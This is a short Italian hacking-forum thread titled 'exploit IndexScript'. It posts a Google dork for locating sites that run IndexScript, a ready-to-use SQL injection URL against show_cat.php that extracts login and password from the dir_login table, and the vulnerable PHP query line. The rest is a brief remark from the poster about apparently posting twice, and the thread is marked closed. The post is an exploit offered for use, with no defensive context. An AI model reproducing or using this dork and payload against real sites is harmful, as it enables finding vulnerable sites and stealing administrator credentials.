exploit IndexScript

Stato
Discussione chiusa ad ulteriori risposte.

Langy

Utente Silver
11 Giugno 2007
148
5
1
83
Codice:
Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in indexscript..

Vul Code:
"$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
 "cat_id=" . fnpreparesql($_GET['cat_id']);"
 
LOL scusate, questa è la seconda volta che mi succede, sto invecchiando che volete!!
 
Stato
Discussione chiusa ad ulteriori risposte.